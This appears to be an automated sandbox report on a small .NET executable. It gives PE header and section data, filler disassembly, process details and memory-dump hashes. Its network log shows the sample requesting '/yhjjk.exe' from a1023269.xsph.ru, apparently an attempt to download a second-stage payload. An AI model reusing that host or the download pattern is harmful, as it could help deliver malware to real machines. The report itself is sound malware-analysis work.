CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0x3b9c0x4f.text
IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x59c.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xc.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG0x3b040x38.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x20000x1bf40x1c007c89af30666e345211fc377e360b72feFalse0.5285993303571429data5.6379279004679015IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc0x40000x59c0x6000b78bc6fe33ebe5b1c71e7d24344f82fFalse0.416015625data4.050448072694083IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc0x60000xc0x200043af4dda3dac06b3cecf8c7c1b3a656False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
NameRVASizeTypeLanguageCountryZLIB Complexity
RT_VERSION0x40900x30cdata0.43205128205128207
RT_MANIFEST0x43ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
DLLImport
mscoree.dll_CorExeMain
TimestampSource PortDest PortSource IPDest IP
Sep 4, 2024 14:08:55.568234921 CEST4973080192.168.2.4141.8.197.42
Sep 4, 2024 14:08:55.573209047 CEST8049730141.8.197.42192.168.2.4
Sep 4, 2024 14:08:55.573308945 CEST4973080192.168.2.4141.8.197.42
Sep 4, 2024 14:08:55.574002981 CEST4973080192.168.2.4141.8.197.42
Sep 4, 2024 14:08:55.578818083 CEST8049730141.8.197.42192.168.2.4
Sep 4, 2024 14:08:56.244098902 CEST8049730141.8.197.42192.168.2.4
Sep 4, 2024 14:08:56.244187117 CEST8049730141.8.197.42192.168.2.4
Sep 4, 2024 14:08:56.244245052 CEST4973080192.168.2.4141.8.197.42
Sep 4, 2024 14:08:56.255774975 CEST4973080192.168.2.4141.8.197.42
Sep 4, 2024 14:08:56.260651112 CEST8049730141.8.197.42192.168.2.4
TimestampSource PortDest PortSource IPDest IP
Sep 4, 2024 14:08:55.531913996 CEST5559753192.168.2.41.1.1.1
Sep 4, 2024 14:08:55.561743021 CEST53555971.1.1.1192.168.2.4
TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
Sep 4, 2024 14:08:55.531913996 CEST192.168.2.41.1.1.10xfd1aStandard query (0)a1023269.xsph.ruA (IP address)IN (0x0001)false
TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
Sep 4, 2024 14:08:55.561743021 CEST1.1.1.1192.168.2.40xfd1aNo error (0)a1023269.xsph.ru141.8.197.42A (IP address)IN (0x0001)false
  • a1023269.xsph.ru
Session IDSource IPSource PortDestination IPDestination PortPIDProcess
0192.168.2.449730141.8.197.42807544C:\Users\user\Desktop\01US71QGnu.exe
TimestampBytes transferredDirectionData
Sep 4, 2024 14:08:55.574002981 CEST75OUTGET /yhjjk.exe HTTP/1.1
Host: a1023269.xsph.ru
Connection: Keep-Alive
Sep 4, 2024 14:08:56.244098902 CEST303INHTTP/1.1 400 Bad Request
Server: openresty
Date: Wed, 04 Sep 2024 12:08:56 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


Click to jump to process

Click to jump to process

Click to dive into process behavior distribution

Click to jump to process

Target ID:0
Start time:08:08:54
Start date:04/09/2024
Path:C:\Users\user\Desktop\01US71QGnu.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\01US71QGnu.exe"
Imagebase:0x650000
File size:9'728 bytes
MD5 hash:4505703B220FA0679096C65FEFB6D832
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:1
Start time:08:08:54
Start date:04/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Reset < >
    Memory Dump Source
    • Source File: 00000000.00000002.1677510309.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_28c0000_01US71QGnu.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 1bf457ebff1e37fcab2aa95a316e6e18818b03b4a06cdc130066b36ea6e39f34
    • Instruction ID: d97af36dc6e807f123fe23ab467bf196e082b401d16ddb684ed961317e3c0741
    • Opcode Fuzzy Hash: 1bf457ebff1e37fcab2aa95a316e6e18818b03b4a06cdc130066b36ea6e39f34
    • Instruction Fuzzy Hash: 87712975A002588FCB15DF68C484ADDBBF2BF89220F2981A9E445EB375DB30DD85CB60
    Memory Dump Source
    • Source File: 00000000.00000002.1677510309.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_28c0000_01US71QGnu.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 6a6b5d6b667d293b04ade686d1719b8c7dd67d71418356128810ddee413c4bf9
    • Instruction ID: 1599e06c11e71d134ff353034173b81a2ee529b611673fca412d28000a80e077
    • Opcode Fuzzy Hash: 6a6b5d6b667d293b04ade686d1719b8c7dd67d71418356128810ddee413c4bf9
    • Instruction Fuzzy Hash: E5414678A10219DFDB15CF98C844ADDBBF2BF89314F248169E405EB3A1CB34A945CB90
    Memory Dump Source
    • Source File: 00000000.00000002.1677510309.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_28c0000_01US71QGnu.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: cb65ae2147f68fe83f4c04a7eedce73dc88abdc4c7cba93d9be631912912f8a9
    • Instruction ID: 28e1953e5c035c7d977698d8ab6df7f27bc41786067d64209866dc50aebb047c
    • Opcode Fuzzy Hash: cb65ae2147f68fe83f4c04a7eedce73dc88abdc4c7cba93d9be631912912f8a9
    • Instruction Fuzzy Hash: 40415678D00259DFCB14CFA9C584ADEBFF1AF48304F24806DE449AB261CB349945CFA0
    Memory Dump Source
    • Source File: 00000000.00000002.1677510309.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_28c0000_01US71QGnu.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 08c81df6664f6e1f61588b4add614abff42942e9f647369ae48dcbcf66cf0da0
    • Instruction ID: 551ca2e951e391ff531115c9abb8aac1a27f59f923c2a478a1eee5e3e1f65872
    • Opcode Fuzzy Hash: 08c81df6664f6e1f61588b4add614abff42942e9f647369ae48dcbcf66cf0da0
    • Instruction Fuzzy Hash: 53316D75A10259DFCB05CFA8C854ADDBBF2FF89300F14856AE401EB3A1DB74A945CB91
    Memory Dump Source
    • Source File: 00000000.00000002.1677510309.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_28c0000_01US71QGnu.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: fe0737d3c9f270f8d3643725e970b2ee30e9944c4374ffeeced3254f6b9c3efa
    • Instruction ID: 2344a3e2f24368f86bd25801d0319d53dc2a37230ec87839a5470f87b8bb7e18
    • Opcode Fuzzy Hash: fe0737d3c9f270f8d3643725e970b2ee30e9944c4374ffeeced3254f6b9c3efa
    • Instruction Fuzzy Hash: E33113B4D00258EFDB14CFAAC584ADEBFF5AF48354F248029E909AB351DB749945CFA0
    Memory Dump Source
    • Source File: 00000000.00000002.1677510309.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_28c0000_01US71QGnu.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 7b34aedeb78fc6b591c018ec8ecad79d1263d6775d1e516a8eab25cd6b2decfd
    • Instruction ID: 72d2c5c695f1c50163a777d273bf90226ae6ce14c65bece577e5b72adca47d87
    • Opcode Fuzzy Hash: 7b34aedeb78fc6b591c018ec8ecad79d1263d6775d1e516a8eab25cd6b2decfd
    • Instruction Fuzzy Hash: 5A21F635A04109EFCB00DFA4D9846AEBBF6EF88710F1881AAE445E7315DB30AD81CB90
    Memory Dump Source
    • Source File: 00000000.00000002.1677510309.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_28c0000_01US71QGnu.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 73e83567a5686abd04f03c4e1100603b3ff02f0d81409d6a1666e9073cb4881f
    • Instruction ID: bcb8f980cc3cc41eca60a5e7e40ba56e0db30355daef00d54960db2caf8619e8
    • Opcode Fuzzy Hash: 73e83567a5686abd04f03c4e1100603b3ff02f0d81409d6a1666e9073cb4881f
    • Instruction Fuzzy Hash: E301B532D1465A9BCB01DBB9DC918DDBFB2AFC6300F1946ABE101B71A0E7702549CB91
    Memory Dump Source
    • Source File: 00000000.00000002.1677295743.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_cdd000_01US71QGnu.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: aa0f94f05f91d55615fbd655fb40008c721a3db520a585f88ab030053530f0ed
    • Instruction ID: 87c4cbdc509f6f2f5462d0ea79da23eb025343f7e3538c66be407980e71c1199
    • Opcode Fuzzy Hash: aa0f94f05f91d55615fbd655fb40008c721a3db520a585f88ab030053530f0ed
    • Instruction Fuzzy Hash: EB01A7314093449AE7104E1ADD84B67FFD8EF41324F19C4ABEE1A4A38AC779DD40C671
    Memory Dump Source
    • Source File: 00000000.00000002.1677510309.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_28c0000_01US71QGnu.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: ab3c64ee7604762c2c6af978a0768f0ceb08b42e13a52ed34cc84ba330b70c8d
    • Instruction ID: a497986c8a596de6925e073298c82873132662eb1b88f7c01d17d1b28eb7ee02
    • Opcode Fuzzy Hash: ab3c64ee7604762c2c6af978a0768f0ceb08b42e13a52ed34cc84ba330b70c8d
    • Instruction Fuzzy Hash: AD01D432D0664A9BCB01CBB4ED405DDBF769FC6310F2A43A6E101B71A0E774265BC751
    Memory Dump Source
    • Source File: 00000000.00000002.1677510309.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_28c0000_01US71QGnu.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: a8758e8932b6388384561d713c2ecd46206909034a317956998b72579597969b
    • Instruction ID: 583dfbcb83e5896214c62af9b82868461bc01962ccc20c565c126b9fcbab8124
    • Opcode Fuzzy Hash: a8758e8932b6388384561d713c2ecd46206909034a317956998b72579597969b
    • Instruction Fuzzy Hash: E5F04C36D101498BDF05C734C452AEFBF725F84300F558539C002BB350DEB0590B8782
    Memory Dump Source
    • Source File: 00000000.00000002.1677510309.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_28c0000_01US71QGnu.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: c9c238b7d4ae5b762ada8f837ed11940e7ecc9bcea12f519c11bfbb207ed56f2
    • Instruction ID: 6a1de0e9ce8663fb751cc60fa1c1a0ded6b651a9e9a7ea9ad1c7965a6d2df734
    • Opcode Fuzzy Hash: c9c238b7d4ae5b762ada8f837ed11940e7ecc9bcea12f519c11bfbb207ed56f2
    • Instruction Fuzzy Hash: 99018132D2061FA7CB00DBA9DC444DDF7B6EFCA310F154666E11177160EB70298ACB91
    Memory Dump Source
    • Source File: 00000000.00000002.1677510309.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_28c0000_01US71QGnu.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 090bf32b92a57b286dac03a36172931e8060a10a0aeb1d4d58fe7cb813e5b766
    • Instruction ID: 68c7203d62af0784ec1291c443e8a77fbd19562eec23aa1d78b0b438556cee56
    • Opcode Fuzzy Hash: 090bf32b92a57b286dac03a36172931e8060a10a0aeb1d4d58fe7cb813e5b766
    • Instruction Fuzzy Hash: E1F04F36A101499BDF15DB78C465AEFBFA25F84704F15862EC442A7250DE7169078B82
    Memory Dump Source
    • Source File: 00000000.00000002.1677295743.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_cdd000_01US71QGnu.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 77d0218a887e0d820056dab71cb1f63eb5375c8fcd642ff4d8c0c8f998a93575
    • Instruction ID: a1e1313febcc30e8b8c525df1240ba82592bda9a8679ea9856e5d22cc18581b9
    • Opcode Fuzzy Hash: 77d0218a887e0d820056dab71cb1f63eb5375c8fcd642ff4d8c0c8f998a93575
    • Instruction Fuzzy Hash: F0F06271409344AEE7108E1AD9C8BA2FFE8EB51724F18C45AED594A286C279AD44CA71
    Memory Dump Source
    • Source File: 00000000.00000002.1677510309.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_28c0000_01US71QGnu.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 037432f4664e52a7600ba45195046c8f98636c6f5ee8b119c8754d36592feeb9
    • Instruction ID: 1f990bc61b67dc83f0f8f4e53571c67e6c99a8bf7176e8b51e09353ebf992958
    • Opcode Fuzzy Hash: 037432f4664e52a7600ba45195046c8f98636c6f5ee8b119c8754d36592feeb9
    • Instruction Fuzzy Hash: 77F0E976D1010997DF08DB64C4556EFFFB69F84300F154529D002B7340DFB0690686D2
    Memory Dump Source
    • Source File: 00000000.00000002.1677510309.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_28c0000_01US71QGnu.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 1120476d440bda21eed3c324a12b19853d67f6b04d7dd3e5c51e1977ead193cc
    • Instruction ID: 49b8a8fdc05608b78c04a45ce1766136372eef4f61c847b7e20a9471a3d388bd
    • Opcode Fuzzy Hash: 1120476d440bda21eed3c324a12b19853d67f6b04d7dd3e5c51e1977ead193cc
    • Instruction Fuzzy Hash: CBF03975B006158FCB08EF78D5149ACBBE1AFC822071581A9D10ACB375DB30DC42CB21
    Memory Dump Source
    • Source File: 00000000.00000002.1677510309.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_28c0000_01US71QGnu.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: e60ba08b0e41ae8b902730eb35fd0fa2ba37062d90b9024c794e49e27bf0dc56
    • Instruction ID: 9a1d704624d104cb7ad4e17237bbb52543a45bbd84ec90b9b6f8cf1c9b265f2f
    • Opcode Fuzzy Hash: e60ba08b0e41ae8b902730eb35fd0fa2ba37062d90b9024c794e49e27bf0dc56
    • Instruction Fuzzy Hash: A3E0DF7180A2C49FE712CBB4CD067ED7FB0AB01240F2441DAF449CB652D6308A40CB52
    Memory Dump Source
    • Source File: 00000000.00000002.1677510309.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_28c0000_01US71QGnu.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 9fcfedef2ef5ab547c0cb74e9908af1d1635e3db60078faf6a2fc206d8e43e0a
    • Instruction ID: 31860d12d4e5886318691cef49fff7747bbae2b33b8b3a4f66f08d7c37be8b9e
    • Opcode Fuzzy Hash: 9fcfedef2ef5ab547c0cb74e9908af1d1635e3db60078faf6a2fc206d8e43e0a
    • Instruction Fuzzy Hash: 78D01771909248AFDB01CFA8C94575D7BB8EB05280F61449AE448CB215DA31DE50C791
    Memory Dump Source
    • Source File: 00000000.00000002.1677510309.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_28c0000_01US71QGnu.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 8d551b70d4b15fd49359c0c523c798009b1e69fc206c771012c5733522c1669e
    • Instruction ID: 8f7e20110728c38afdbf171b78dbd92bbdfbc45364ca59958888df0779221cc5
    • Opcode Fuzzy Hash: 8d551b70d4b15fd49359c0c523c798009b1e69fc206c771012c5733522c1669e
    • Instruction Fuzzy Hash: AFD05E7AA4120C8FCB14DFA8D9404ECBBB1EFC4220B2481B6C119A7274C730CD92C721
    Memory Dump Source
    • Source File: 00000000.00000002.1677510309.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_28c0000_01US71QGnu.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: fcde5b6ac8d71f257df1b8dd8217545ba2646f70f46b7e409229c730ae002e54
    • Instruction ID: 69df9063c210a36e622ee480ff685d15142d8c7f389eaf7fd322ba49854b1685
    • Opcode Fuzzy Hash: fcde5b6ac8d71f257df1b8dd8217545ba2646f70f46b7e409229c730ae002e54
    • Instruction Fuzzy Hash: EBD0A92AB802498FCB109BE8E8000DC7BA0DAC013071001AAC119C32A0C770C9A6C322
    Memory Dump Source
    • Source File: 00000000.00000002.1677510309.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_28c0000_01US71QGnu.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 1c379294619097f142f0def6e34b1b0b96a4a2fee231daa15a1c823b69000d89
    • Instruction ID: 48b82d490b0222aaa29755000a77e9b278593bdf220419ad41acec0961fa84c3
    • Opcode Fuzzy Hash: 1c379294619097f142f0def6e34b1b0b96a4a2fee231daa15a1c823b69000d89
    • Instruction Fuzzy Hash: 7DD0A776A01209CFCF00CFD4D8047ECB7B0EBC0230F2401A6C115A32A0C3308E85C751
    Memory Dump Source
    • Source File: 00000000.00000002.1677510309.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_28c0000_01US71QGnu.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: d8e1472c226938aa60300233acdebf9724c0cd46a552f39b050408ddb063c1f7
    • Instruction ID: 3f06dec69e60ddd044fe4574259721076af6b866ef0e1e4786035e397badfcf8
    • Opcode Fuzzy Hash: d8e1472c226938aa60300233acdebf9724c0cd46a552f39b050408ddb063c1f7
    • Instruction Fuzzy Hash: C8B0127EA8000CC5CF00CBC5F0003ECB770E78027AF100067C20CA2900833003648692